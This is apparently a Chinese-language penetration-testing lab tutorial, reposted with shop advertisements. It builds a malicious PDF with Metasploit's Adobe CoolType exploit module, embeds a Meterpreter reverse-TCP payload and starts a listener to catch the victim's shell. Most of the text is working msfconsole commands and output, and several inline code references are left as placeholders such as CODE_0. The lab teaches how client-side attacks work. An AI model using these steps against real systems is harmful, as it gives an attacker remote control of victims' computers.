发布于2026-08-19 阅读(0)
扫一扫,手机访问
在本实验中,你将使用 Metasploit Framework 创建一个恶意的 PDF 文件,深入了解客户端攻击。客户端攻击针对用户计算机上的应用程序漏洞,例如网页浏览器、媒体播放器或文档查看器。
PDF 文件是这些攻击的常见载体,因为它们被广泛使用且用户通常信任它们。通过将恶意代码(payload)嵌入看似无害的 PDF 中,攻击者可以在易受攻击的 PDF 阅读器打开文件时,获得对受害者系统的控制权。
你将学习如何选择特定的 exploit,使用 payload 配置它,生成恶意文件,并设置一个 listener 来处理来自受损系统的连接。本实验提供了对这类攻击如何构建的基础理解。
在这个步骤里,你要启动Metasploit Framework控制台,并选取用于创建恶意PDF的对应exploit模块。Metasploit Framework可是个厉害的渗透测试工具,而它的控制台 CODE_0 则是与之交互的主要界面。
首先,打开一个终端并启动 Metasploit 控制台。这可能需要一些时间来初始化。
msfconsole -q
CODE0 标志会抑制 banner,以便更快地启动。加载完成后,你将看到 CODE1 提示符。
我们将使用一个针对 Adobe Reader 中已知漏洞的 exploit。该模块名为 CODE0。使用 CODE1 命令加载此模块。
use exploit/windows/fileformat/adobe_cooltype_sing
执行命令后,你将注意到命令提示符已更改,以反映当前加载的模块。
msf6 > use exploit/windows/fileformat/adobe_cooltype_sing
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(windows/fileformat/adobe_cooltype_sing) >
这确认了该模块现在已激活并准备好进行配置。
在此步骤中,你将配置所选 exploit 模块的选项。每个模块都有一组可以自定义的选项。要查看当前模块的可用选项,请使用 CODE_0 命令。
show options
此命令将显示一个可设置的参数表,例如输出文件的文件名和 payload 设置。
```plaintext
Module options (exploit/windows/fileformat/adobecooltypesing):
名称 当前设置 必填 描述
---- --------------- ------ ---------------
FILENAME msf.pdf 是 文件名。
...
Payload options (generic/shellreversetcp):
...
```
我们需要设置 CODE0 选项来指定我们恶意 PDF 文件的名称。我们将它命名为 CODE1。使用 CODE_2 命令来分配此值。
set FILENAME malicious.pdf
你可以再次运行 CODE0 来验证 CODE1 是否已成功更新。
FILENAME malicious.pdf yes The file name.
在此步骤中,你将配置 payload。Payload 是在 exploit 成功后将在目标系统上执行的代码。我们将使用 CODE_0 payload,它会强制受害者机器连接回我们的机器。
首先,将 payload 设置为 CODE_0。Meterpreter 是一个高级的、动态可扩展的 payload,它提供了比标准 shell 更多的功能。
set payload windows/meterpreter/reverse_tcp
接下来,我们需要配置 payload 的选项:CODE0 和 CODE1。
要查找你的机器的 IP 地址,你可以打开一个新的终端标签页并运行 CODE0 命令。查找与 CODE1 接口关联的 IP 地址。
ip a
现在,将 CODE0 设置为你的 IP 地址(将 CODE1 替换为实际 IP),并将 CODE2 设置为一个常用端口,例如 CODE3。
set LHOST YOUR_IP_ADDRESS
set LPORT 4444
再运行一次 CODE0 来确认所有设置是否正确。你应该能看到你已配置的 CODE1、CODE2、CODE3 和 CODE_4。
在此步骤中,所有选项都已配置完毕,你已准备好生成恶意 PDF 文件。CODE0 命令(或其别名 CODE1)会将 exploit 和 payload 组装成最终文件。
在你的 CODE0 窗口中执行 CODE1 命令。
exploit
Metasploit 现在将创建 PDF 文件。输出将显示该过程,最重要的是,文件已保存在何处。
[*] Creating 'malicious.pdf' file...
[+] malicious.pdf stored at /home/labex/.msf4/local/malicious.pdf
文件现已创建。在实际场景中,攻击者会将此文件发送给目标,例如作为电子邮件附件。你可以使用新终端中的 CODE_0 命令来验证其是否存在。
ls -l /home/labex/.msf4/local/malicious.pdf
-rw-r--r-- 1 labex labex 12345 Date Time /home/labex/.msf4/local/malicious.pdf
在此步骤中,你将设置一个监听器(也称为 handler),用于在恶意 PDF 被打开时“接收”来自受害者机器的传入连接。如果没有 handler,payload 将无处连接。
我们将使用 CODE_0 模块,这是一个通用的监听器。
use exploit/multi/handler
现在,你必须使用与嵌入 PDF 文件中完全相同的 payload 和选项(CODE0 和 CODE1)来配置此 handler。这对于连接成功至关重要。
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP_ADDRESS
set LPORT 4444
请记住再次将 CODE_0 替换为你的机器的 IP 地址。
配置好 handler 后,使用 CODE0 命令运行它。CODE1 标志会将 handler 作为后台作业运行,这样在监听器激活时,你的 CODE_2 提示符仍然可用以执行其他命令。
exploit -j
你将看到一个 handler 已启动的确认信息。
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on YOUR_IP_ADDRESS:4444
handler 现在正在监听连接。在此实验中,我们不会模拟受害者打开文件,但你的设置已完成。你已成功创建了一个恶意文件,并准备了一个监听器来处理反向 shell。
在此实验中,你已成功完成了使用 Metasploit Framework 为客户端攻击创建恶意 PDF 的基本步骤。
你学会了如何:
本次练习提供了对常见攻击向量背后机制的实践理解,并强调了保持软件(尤其是文档阅读器)更新以防范此类漏洞的重要性。
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
正版软件
正版软件
正版软件
正版软件
正版软件
1
2
3
4
5
6
7
8
9